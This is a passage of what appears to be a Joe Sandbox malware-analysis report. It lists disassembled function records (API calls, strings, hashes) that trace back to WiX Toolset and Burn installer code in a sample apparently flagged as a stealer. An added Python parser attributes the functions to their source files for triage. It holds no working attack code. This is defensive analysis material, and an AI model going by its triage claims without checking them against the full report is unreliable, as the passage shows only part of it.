• Opcode Fuzzy Hash: af84df120d6364cfe8ac61c1b8645785ded3e32762ccbc1bdfa0c68dcadc4823
• Instruction Fuzzy Hash: B321EA77F4031DB7DB219B549C06FEE7EAC9F84B54F004095BB18BA2D0E2B15E80D690
APIs
• CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,00000000,00000000,?,00000000,?), ref: 00932BF1
• CloseHandle.KERNEL32(00000000), ref: 00932C80
Strings
• -%ls=%Iu, xrefs: 00932C08, 00932C4B
• burn.filehandle.self, xrefs: 00932C03, 00932C46
• Failed to append the file handle to the command line., xrefs: 00932C1E
• d:\a\wix4\wix4\src\burn\engine\core.cpp, xrefs: 00932C30
• Failed to append the file handle to the obfuscated command line., xrefs: 00932C61
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix4\wix4\src\burn\engine\core.cpp
• API String ID: 3498533004-2018830601
• Opcode ID: f9155c8633d8be75995bcce922356ee98ddfb6d5dde32715f46f65ac6f70a6a2
• Instruction ID: 9f5536918f0bfbcd26aa0fea81643a8cda1b37b41fa9778817bf9b26006b4a11
• Opcode Fuzzy Hash: f9155c8633d8be75995bcce922356ee98ddfb6d5dde32715f46f65ac6f70a6a2
• Instruction Fuzzy Hash: 3A11B231A80329B7E7217F588D0AF9F3E689B85B75F100341FA64B62D1E3F449518B91
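Every function record in this stretch carries a `d:\a\wix4\wix4\src\...` build path in its strings, which places the code in the WiX Toolset's dutil library or in the Burn bootstrapper engine (`core.cpp`, with its `-burn.filehandle.self=%Iu` argument that hands the bundle's own file handle to the child process it spawns). For triage that matters: these functions are the stock installer framework, so the stealer behaviour flagged in the signatures at the top of the report should be looked for in what the bundle drops and runs, not in this engine code. The parser below reads records in the "APIs / Strings / Similarity" layout used on this page, attributes each function to its WiX source file and reports the Burn indicators it finds. It is an added example, not code from the report or from the WiX project; the sample records are copied from this page and shortened, and the indicator list is the editor's own choice.

```python
import re
from dataclasses import dataclass, field

# Constructed input: three function records copied from this report, with the
# argument lists and the "Memory Dump Source" block shortened.
SAMPLE_RECORDS = r"""APIs
• CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000), ref: 00932BF1
• CloseHandle.KERNEL32(00000000), ref: 00932C80
Strings
• -%ls=%Iu, xrefs: 00932C08, 00932C4B
• burn.filehandle.self, xrefs: 00932C03, 00932C46
• Failed to append the file handle to the command line., xrefs: 00932C1E
• d:\a\wix4\wix4\src\burn\engine\core.cpp, xrefs: 00932C30
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: CloseCreateFileHandle
• String ID: -%ls=%Iu$Failed to append the file handle to the command line.$burn.filehandle.self$d:\a\wix4\wix4\src\burn\engine\core.cpp
• API String ID: 3498533004-2018830601
APIs
• CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000), ref: 00916313
• GetLastError.KERNEL32(?,0092ED80,00000000), ref: 00916321
Strings
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: cannot find parent path$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
• API String ID: 1375471231-3388094611
Strings
Similarity
• API ID:
• String ID: %ls%ls$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 0-242608188
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^• (?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]+(?:, [0-9A-F]+)*)$")
SOURCE_RE = re.compile(r"^[a-z]:\\.*\.(?:cpp|c|h)$", re.IGNORECASE)

# Editor's choice of Burn engine markers (assumption, not a list from the report):
# the command-line switch Burn uses to pass its own file handle to a child process,
# and the engine's build path left in the binary.
BURN_INDICATORS = (
    "burn.filehandle.self",
    "d:\\a\\wix4\\wix4\\src\\burn\\engine\\",
)


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (function, module, ref address)
    strings: dict = field(default_factory=dict)   # string text -> list of xref addresses
    api_id: str = ""
    string_ids: list = field(default_factory=list)
    api_string_id: str = ""

    @property
    def source_file(self):
        """First string that looks like a source path (the PDB-style build path)."""
        for s in self.string_ids + list(self.strings):
            if SOURCE_RE.match(s):
                return s
        return None


def parse_records(text):
    """Split the report text into FunctionRecords; a record ends at its 'API String ID' line."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()            # the page carries long leading indentation
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append((m["func"], m["module"], m["ref"]))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings[m["text"]] = m["xrefs"].split(", ")
        elif section == "Similarity":
            if line.startswith("• API String ID:"):
                current.api_string_id = line.split(":", 1)[1].strip()
                records.append(current)   # last field of a record; start the next one
                current = FunctionRecord()
            elif line.startswith("• API ID:"):
                current.api_id = line.split(":", 1)[1].strip()
            elif line.startswith("• String ID:"):
                ids = line.split(":", 1)[1].strip()
                current.string_ids = ids.split("$") if ids else []
    return records


def attribute_by_source(records):
    """Map each source file to the API IDs of the functions compiled from it."""
    by_source = {}
    for rec in records:
        by_source.setdefault(rec.source_file or "<unknown>", []).append(rec.api_id)
    return by_source


def burn_indicators(records):
    """Burn engine markers present anywhere in the records (empty list = none found)."""
    found = set()
    for rec in records:
        for s in rec.string_ids + list(rec.strings):
            for ind in BURN_INDICATORS:
                if s.lower().startswith(ind.lower()):
                    found.add(ind)
    return sorted(found)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for src, ids in attribute_by_source(recs).items():
        print(f"{src}: {', '.join(i or '<no APIs>' for i in ids)}")
    print("Burn indicators:", burn_indicators(recs))
```

Run against the full report text, the source-file map quickly shows how much of the analysed code is the installer framework; anything that does not resolve to a WiX build path is where to spend reverse-engineering time.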
APIs
• VariantInit.OLEAUT32(00917D5B), ref: 00970651
  • Part of subcall function 0096FE01: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00917DDB,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?), ref: 0096FE1F
  • Part of subcall function 0096FE01: GetLastError.KERNEL32(?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?,?,?,?,?), ref: 0096FE2B
Strings
• failed XmlCreateDocument, xrefs: 00970674
• failed put_resolveExternals, xrefs: 009706F1
• failed put_validateOnParse, xrefs: 009706B5
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970683, 009706C4
• failed loadXML, xrefs: 00970761
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                                  • API String ID: 52713655-3681987369
                                                                                                                                                                  • Opcode ID: edba617c8bdaae96102270389472e0158c5ccbf5df57b77dba76cab706deb218
                                                                                                                                                                  • Instruction ID: 0149adc34959de0d5d6786394a91593d1838125bb1ae0486a812ec564cdae12f
                                                                                                                                                                  • Opcode Fuzzy Hash: edba617c8bdaae96102270389472e0158c5ccbf5df57b77dba76cab706deb218
                                                                                                                                                                  • Instruction Fuzzy Hash: 0041A372B40718ABDB05DF68CC45FDE77B9AF89710F018069F519FB290EA70AD008B94
APIs
• GetLastError.KERNEL32(?,?,?,009762A5,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 00975FBC
Strings
• Failed to re-allocate more space for expanded path., xrefs: 00976027
• Failed to get max length of written input buffer., xrefs: 00976016
• Failed to expand environment variables in string: %ls, xrefs: 00976052
• Failed to get max length of input buffer., xrefs: 00975F5F
• Failed to allocate space for expanded path., xrefs: 00975F98
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 00975F6B, 00976044, 00976049, 0097605E
Similarity
• API ID: ErrorLast
• String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp
• API String ID: 1452528299-33012345
• Opcode ID: 366dc861e591dcad84512a5a19fd94fa0c0e1c13816162a6900e620a4d3296d9
• Instruction ID: 14039c10c0f6a1fd3c22640cc54eaffa215249ab21a4d3d56da92125613169ae
• Opcode Fuzzy Hash: 366dc861e591dcad84512a5a19fd94fa0c0e1c13816162a6900e620a4d3296d9
• Instruction Fuzzy Hash: 89313B73B40B25B7EB325A558C4AF6F7E6CAB41BA0F124511FE08BF2C1D6B09D1096D0
Strings
Similarity
• API ID:
• String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
• API String ID: 0-492501437
• Opcode ID: 1f962077b66ea5a8cd8246560e98948e3473baa3fe00a4e308546acdae6a19aa
• Instruction ID: 98c1ab6fb5fd155ae85631a143d17264e0abf499167e68af84c712b29ad459bf
• Opcode Fuzzy Hash: 1f962077b66ea5a8cd8246560e98948e3473baa3fe00a4e308546acdae6a19aa
• Instruction Fuzzy Hash: FD21F872B4122877D72196648C4AFFF7A6DDB86B64F110601F601BB1C1E7B89D409AE1
APIs
• lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0096CDF4), ref: 0096D224
  • Part of subcall function 009155C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0093DE2B,?), ref: 009155D3
  • Part of subcall function 009155C9: RtlFreeHeap.NTDLL(00000000,?,?,0093DE2B,?), ref: 009155DA
  • Part of subcall function 009155C9: GetLastError.KERNEL32(?,?,0093DE2B,?), ref: 009155E4
Strings
Similarity
• API ID: Heap$ErrorFreeLastProcesslstrlen
• String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 1805815496-598890354
• Opcode ID: a796a6b99c0b2294d029124998de427344aa86cea140b81449e42e4e5ccdc600
• Instruction ID: e51e47d1274dcd5ab747243cfa5ac7aa30ac131d1b761996720567431a33578d
• Opcode Fuzzy Hash: a796a6b99c0b2294d029124998de427344aa86cea140b81449e42e4e5ccdc600
• Instruction Fuzzy Hash: DB41E431F42219BBDF21AF58CC5AFAE36ACAF87750F120050FA20AB180D3B4DD41CA90
APIs
• ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00972BBF
Strings
Similarity
• API ID: FileRead
• String ID: Failed to read from source.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 2738559852-3357669501
• Opcode ID: 17ecefa86780ce380ac42544ec0744373727abf98cfda9ad0deddd91862bdd88
• Instruction ID: de4a380def07eff7d2f353321e0ab05889f6087f0250f0091feca14986805536
• Opcode Fuzzy Hash: 17ecefa86780ce380ac42544ec0744373727abf98cfda9ad0deddd91862bdd88
• Instruction Fuzzy Hash: E341C973A10269ABDB21CF14CC41BEE73B8EF85751F0580A6B94DE7240D6B4DEC49BA0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0093E158
• GetLastError.KERNEL32(?,?,?), ref: 0093E162
Strings
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
• API String ID: 2976181284-2861879377
• Opcode ID: 8950b3c0c98c77a39e321f3bc978eb3f0ca8e743b73a7696b7ded0dc8a464e8d
• Instruction ID: 13b5ff7069094a6df4e2d6af08f7fd635e702693c01a6c372e13e532a7b6e655
• Opcode Fuzzy Hash: 8950b3c0c98c77a39e321f3bc978eb3f0ca8e743b73a7696b7ded0dc8a464e8d
• Instruction Fuzzy Hash: F2319075B0421ABFDB20DFA8DC85EAAB7A8FB08754F048615F915A7291E370ED10CB90
Strings
• Failed to open policy registry key., xrefs: 00976626
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 009765DD, 00976635
• Failed to combine logging path with root path., xrefs: 009765CE
• SOFTWARE\Policies\, xrefs: 009765BE
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 0-3658365009
                                                                                                                                                                  • Opcode ID: 0816bd8bde112c4508f5647abfe12806a35da99d3f0c5ae6039ad99bbfc4842c
                                                                                                                                                                  • Instruction ID: fc912bf18de6f7d7bc1fefa01bc4d0f740809431d727765ac3c42c4c3bcc8a0d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0816bd8bde112c4508f5647abfe12806a35da99d3f0c5ae6039ad99bbfc4842c
                                                                                                                                                                  • Instruction Fuzzy Hash: F1110633B40725FBDB3166A48C0BFAE7A6C8B81B54F558011B908BA1D2D6B5CE50E6E1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091174A: WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(0097E7E8,00000000), ref: 0096BF6C
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091768F,?,000000FF,?,?,?,00000001), ref: 0096BF76
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastObjectProcessSingleWait
                                                                                                                                                                  • String ID: Failed to get process return code.$Failed to wait for process to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 1402617016-1146304469
                                                                                                                                                                  • Opcode ID: e23f5bfd4c21cb8b3e108b38860e5064c1b39abc6bf7a0e537362b67dec18ff0
                                                                                                                                                                  • Instruction ID: 97122dc85c51bad15fe6c3ad145acd63fb92b84167d9ddea3ef251fe88e2b5a7
                                                                                                                                                                  • Opcode Fuzzy Hash: e23f5bfd4c21cb8b3e108b38860e5064c1b39abc6bf7a0e537362b67dec18ff0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8201C433B4022977D7313554DC0AFAF2A5CDF45B94F050525FE08EA2A1F3658CD09AE0
                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00975CDB
                                                                                                                                                                  • StringFromGUID2.OLE32(?,00000000,00000027), ref: 00975D02
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                  • String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
                                                                                                                                                                  • API String ID: 4041566446-2208176607
                                                                                                                                                                  • Opcode ID: aeed640c6798ad7839b62fee4b3b820e5b13401c71ac56f4e32a0e7eb00e21f3
                                                                                                                                                                  • Instruction ID: 4a3ad941aef83d634fa3edc0b669419be90b4923af36606928b57b48a11a6e84
                                                                                                                                                                  • Opcode Fuzzy Hash: aeed640c6798ad7839b62fee4b3b820e5b13401c71ac56f4e32a0e7eb00e21f3
                                                                                                                                                                  • Instruction Fuzzy Hash: C301D276B44708B6EB2096B4CC4EFEFBBACDB8DB15F010425F609FB1C1E1A08D0486A1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 00917E48
                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 00917DDE
                                                                                                                                                                  • Failed to run embedded mode., xrefs: 00917E12
                                                                                                                                                                  • Invalid run mode., xrefs: 00917DA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Invalid run mode.
                                                                                                                                                                  • API String ID: 0-2744884814
                                                                                                                                                                  • Opcode ID: 68cafeee8908ffa0219f357e2de18b708d0d5a673af4205c83cc198d92c761e2
                                                                                                                                                                  • Instruction ID: 099934d9fc748c212fb557cb8a6e8a3c07b8fb26f554e4be803cc85cbd24156c
                                                                                                                                                                  • Opcode Fuzzy Hash: 68cafeee8908ffa0219f357e2de18b708d0d5a673af4205c83cc198d92c761e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 8951A631B4922E96EB31AAA0CC16BEEB6B8BB40700F1445E6F548762C1DF748DC5DF91
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00916570,00000000,?,?,?,?,?), ref: 00917BB5
                                                                                                                                                                    • Part of subcall function 0093D137: CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0093D2CD
                                                                                                                                                                    • Part of subcall function 0093D137: CloseHandle.KERNEL32(00000000,?), ref: 0093D2E2
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to initialize COM., xrefs: 00917BC1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$Initialize
                                                                                                                                                                  • String ID: Failed to initialize COM.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 4100669059-4079876660
                                                                                                                                                                  • Opcode ID: 23de5398910aecc46a7cd1912db6ec50847b42ac5548ae5c15bc83fdf6451f87
                                                                                                                                                                  • Instruction ID: 689797c31181442ab8520c450c60933b8e801e37d61db36df1e5bef10c26f0ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 23de5398910aecc46a7cd1912db6ec50847b42ac5548ae5c15bc83fdf6451f87
                                                                                                                                                                  • Instruction Fuzzy Hash: 54416431A0922D97EB30B6A0CC06BEEB2B8BB40305F1844D5B54862192DF745DC5DF92
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,0092C9FA,WiX\Burn,EngineWorkingDirectory,00000000), ref: 009768C4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00976845, 009768A5
                                                                                                                                                                  • Failed to open policy key: %ls, xrefs: 00976839
                                                                                                                                                                  • Failed to open policy key: %ls, name: %ls, xrefs: 00976896
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-3938230626
                                                                                                                                                                  • Opcode ID: f41b73965107f18a67ed80d971fdea3e35a7d3a142fc770eac1e789071c2c72d
                                                                                                                                                                  • Instruction ID: fe167d748972b1e8a75958ea2e984f7b9cde699480ac5922dca5d9e1db5342c0
                                                                                                                                                                  • Opcode Fuzzy Hash: f41b73965107f18a67ed80d971fdea3e35a7d3a142fc770eac1e789071c2c72d
                                                                                                                                                                  • Instruction Fuzzy Hash: F921F333A0072ABBEB315FD48C06BEE7A68DF44750F108135BA0836190E3B58D60E6D2
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,0092F5CE,WiX\Burn,PackageCache,00000000,0000001C), ref: 009767D9
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00976760, 009767BA
                                                                                                                                                                  • Failed to open policy key: %ls, xrefs: 00976754
                                                                                                                                                                  • Failed to open policy key: %ls, name: %ls, xrefs: 009767AE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-3938230626
                                                                                                                                                                  • Opcode ID: 25c31ae387fc30837ebec9701e63a2c70f4fb9bbcf629bd39f20fb55b182de24
                                                                                                                                                                  • Instruction ID: 6bf8257bf054be4e40643b985bc73f061dcec7e0f1bcb25692fbbae93b151f2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 25c31ae387fc30837ebec9701e63a2c70f4fb9bbcf629bd39f20fb55b182de24
                                                                                                                                                                  • Instruction Fuzzy Hash: C721F733A00729FBDF355EE4CC46BEE7A68AF40B99F158424FA0835190D3B94D60E6D1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00917659,?,?,00000001,00000000,00000000), ref: 00933844
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00917659,?,?,00000001,00000000,00000000), ref: 0093384A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
